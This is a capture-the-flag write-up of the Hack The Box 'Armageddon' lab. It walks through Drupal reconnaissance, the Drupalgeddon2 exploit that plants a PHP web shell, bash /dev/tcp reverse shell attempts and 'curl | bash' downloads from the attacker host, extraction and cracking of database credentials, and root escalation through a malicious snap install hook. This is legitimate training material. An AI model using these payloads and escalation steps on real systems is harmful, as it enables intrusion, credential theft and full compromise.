> For the complete documentation index, see [llms.txt](https://vinetsuicide.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vinetsuicide.gitbook.io/writeups/linux/easy-boxes/armageddon.md).

# Armageddon

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FOAI1kjNXYPE91XuhQpQr%2FArmageddon.png?alt=media&amp;token=8498e597-ba0b-4fa0-9907-dcbc0dca68e4" alt="" width="563"><figcaption><p>Armageddon</p></figcaption></figure>

## <mark style="color:blue;">Recon</mark>

```bash
ping -c 1 10.10.10.233                                                                 
PING 10.10.10.233 (10.10.10.233) 56(84) bytes of data.
64 bytes from 10.10.10.233: icmp_seq=1 ttl=63 time=60.4 ms

--- 10.10.10.233 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 60.410/60.410/60.410/0.000 ms
```

Looks like target is Linux, and it is alive sp lets start nmap scan.

```bash
sudo nmap 10.10.10.233 -p- -T5 -sC -sV -oN armageddon  
```

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Welcome to  Armageddon |  Armageddon
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-generator: Drupal 7 (http://drupal.org)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 463.91 seconds
```

Only 2 ports open, for SSH need creds, so lets check HTTP.

## <mark style="color:green;">HTTP</mark>

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FU8J8dlP9kWJe8kHZypXw%2FPasted%20image%2020240302180404.png?alt=media&amp;token=7d66fda8-a828-4a1c-a933-199c8643e6d5" alt=""><figcaption><p>Drupal</p></figcaption></figure>

Very similar to Drupal CMS, I will use droopescan for this one.

```bash
./droopescan scan drupal -u http://10.10.10.233/
[+] Plugins found:                                                              
    profile http://10.10.10.233/modules/profile/
    php http://10.10.10.233/modules/php/
    image http://10.10.10.233/modules/image/

[+] Themes found:
    seven http://10.10.10.233/themes/seven/
    garland http://10.10.10.233/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.233/CHANGELOG.txt

[+] Scan finished (0:04:01.212172 elapsed)
```

### <mark style="color:red;">apache shell</mark>

&#x20;Well only version is interesting, lets check it on searchsploit.

```bash
searchsploit Drupal 7.56
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                                    | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                                    | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                                                                 | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                         | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                     | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                     | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                            | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                       | php/remote/46510.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                       | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                                                                              | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                                                                          | php/webapps/46459.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
```

There are popular exploits for drupal named Drupalgeddon, for 3rd version we need to be Authenticated, but there is no credentials and brute-force is not the way.

Lets try this one -> [Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)

```bash
sudo gem install highline
```

```bash
ruby drupalgeddon.rb http://10.10.10.233/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo PZGQARWE
[+] Result : PZGQARWE
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> whoami
apache
```

and we got a web-shell. But I would suggest a pretty reverse shell.

```bash
armageddon.htb>> which nc
which: no nc in (/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin)
armageddon.htb>> bash -c 'bash -i >& /dev/tcp/10.10.16.5/4224 0>&1' 
[!] WARNING: Detected an known bad character (>)
```

Tried to get it, but nothing worked.

```bash
armageddon.htb>> curl 10.10.16.5/shell | bash                                                                                                                                                                                                 
bash: connect: Permission denied
bash: line 1: /dev/tcp/10.10.16.5/4224: Permission denied
```

hmm..

Ok well lets try enumerate with web-shell.

```bash
armageddon.htb>> cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
```

only 2 users on the box.

```bash
armageddon.htb>> ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root       962  0.0  0.3 450300 14936 ?        Ss   14:43   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1059  0.0  0.6 462532 23692 ?        S    14:43   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1060  0.0  0.6 462016 23404 ?        S    14:43   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1061  0.0  0.6 463368 24780 ?        S    14:43   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1062  0.0  0.3 452524 13884 ?        S    14:43   0:00 /usr/sbin/httpd -DFOREGROUND
apache    1063  0.0  0.5 461748 23084 ?        S    14:43   0:00 /usr/sbin/httpd -DFOREGROUND
apache    2035  0.0  0.3 452012 13356 ?        S    14:51   0:00 /usr/sbin/httpd -DFOREGROUND
apache    2049  0.0  0.6 462012 23360 ?        S    14:51   0:00 /usr/sbin/httpd -DFOREGROUND
apache    2051  0.0  0.6 462272 23676 ?        S    14:51   0:00 /usr/sbin/httpd -DFOREGROUND
apache    2134  0.0  0.3 452332 13468 ?        S    14:55   0:00 /usr/sbin/httpd -DFOREGROUND
apache    2139  0.0  0.3 452004 13344 ?        S    14:55   0:00 /usr/sbin/httpd -DFOREGROUND
apache    2614  0.0  0.0  11688  1344 ?        S    15:23   0:00 sh -c ps -aux 2>&1
apache    2615  0.0  0.0  51732  1704 ?        R    15:23   0:00 ps -aux
```

```bash
armageddon.htb>> netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:25                  :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:45916        TIME_WAIT   timewait (49.35/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:47314        TIME_WAIT   timewait (33.02/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:42236        TIME_WAIT   timewait (36.57/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:46764        ESTABLISHED keepalive (7206.52/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:47300        TIME_WAIT   timewait (28.64/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:41176        TIME_WAIT   timewait (15.64/0/0)
tcp6       0      0 10.10.10.233:80         10.10.16.5:45910        TIME_WAIT   timewait (44.00/0/0)
raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)
```

```bash
armageddon.htb>> env
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
PWD=/var/www/html
LANG=C
NOTIFY_SOCKET=/run/systemd/notify
SHLVL=1
_=/usr/bin/env
```

Nothing interesting...

Ok I really need reverse shell, I will upload a php-reverse-shell to web-root and will hit a shell.

```bash
rlwrap nc -lnvp 443 
listening on [any] 443 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.233] 37526
bash: no job control in this shell
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
```

and yeah it is worked.

Going to upgrade my shell to TTY

```bash
bash-4.2$ which python
which python
/usr/bin/python
bash-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/lib64/python2.7/pty.py", line 165, in spawn
    pid, master_fd = fork()
  File "/usr/lib64/python2.7/pty.py", line 107, in fork
    master_fd, slave_fd = openpty()
  File "/usr/lib64/python2.7/pty.py", line 29, in openpty
    master_fd, slave_name = _open_terminal()
  File "/usr/lib64/python2.7/pty.py", line 70, in _open_terminal
    raise os.error, 'out of pty devices'
OSError: out of pty devices
```

Bunch of errors. Ok lets use this shell.

Time for linpeas!

### <mark style="color:red;">brucethereadmin shell</mark>

```bash
bash-4.2$ curl http://10.10.16.5/linpeas.sh | bash
```

```bash
'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
```

linpeas found a credentials for mysql, lets log in.

```bash
mysql -p'CQHEy@9M*m23gBVj' drupal -u drupaluser -e 'show tables;'
```

```sql
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog
```

Interesting one is users.

```bash
mysql -p'CQHEy@9M*m23gBVj' drupal -u drupaluser -e 'describe users;'                                                                                                                                                               
<*m23gBVj' drupal -u drupaluser -e 'describe users;'                         
Field   Type    Null    Key     Default Extra
uid     int(10) unsigned        NO      PRI     0
name    varchar(60)     NO      UNI
pass    varchar(128)    NO
mail    varchar(254)    YES     MUL
theme   varchar(255)    NO
signature       varchar(255)    NO
signature_format        varchar(255)    YES             NULL
created int(11) NO      MUL     0
access  int(11) NO      MUL     0
login   int(11) NO              0
status  tinyint(4)      NO              0
timezone        varchar(32)     YES             NULL
language        varchar(12)     NO
picture int(11) NO      MUL     0
init    varchar(254)    YES
data    longblob        YES             NULL
```

```bash
mysql -p'CQHEy@9M*m23gBVj' drupal -u drupaluser -e 'select name,pass from users;'                                                                                                                                                  
<*m23gBVj' drupal -u drupaluser -e 'select name,pass from users;'            
name    pass

brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
test    $S$DaacooQ2NCahxFc.zsoCeMV3.CrLfODbIAFNg76YYldMu3pqcsfs
```

There is a hash for *<mark style="color:red;">"brucetherealadmin"</mark>*

```bash
hashcat hash /usr/share/wordlists/rockyou.txt
```

```bash
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
```

And we got a password.

```bash
ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ id
uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```

we are in!

```bash
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
```

So we can see that we can install snap as root.&#x20;

<figure><img src="https://1917368546-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fnw4r2mxNQ0V4AzmY89Pb%2Fuploads%2FkXR9VlBjnCP4Y33SwwKc%2Fimage.png?alt=media&amp;token=b724b458-9a4a-4b8f-a53a-b9b909390340" alt=""><figcaption></figcaption></figure>

So we need to install a malicious snap, also we need to install *<mark style="color:blue;">"fpm"</mark>*

Firstly I need to create a package on my own host and after that transfer it to target.

```bash
COMMAND=bash -c 'bash -i >& /dev/tcp/10.10.16.5/9001 0>&1'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
-c: command not found
Created package {:path=>"xxxx_1.0_all.snap"}
```

```bash
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "xxxx" snap if present (run hook "install": bash: : No such file or directory)
```

Hmm I didnt get a shell. maybe there is some of bad characters?

Ok I will create a bash file with reverse shell in /tmp directory, and will execute it like this.

```bash
sudo snap install rev_1.0_all.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "rev" snap if present (run hook "install": bash: /tmp/shell.sh: No such file or directory)
```

Same...

Ok lets try to cat a root.flag.

```bash
COMMAND="cat /root/root.txt"
                                                                                                                                                                                                                                              
musor@kali:/tmp$ cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
                                                                                                                                                                                                                                              
musor@kali:/tmp/tmp.lu2iZbBuCb$ fpm -n flag -s dir -t snap -a all meta                                                                                                                                                                       
Created package {:path=>"flag_1.0_all.snap"}
```

```bash
[brucetherealadmin@armageddon tmp]$ sudo snap install flag_1.0_all.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "flag" snap if present (run hook "install": 5b12a666ff60d183a5c914869e2609f6)
```

again an error but there is a root.flag :)
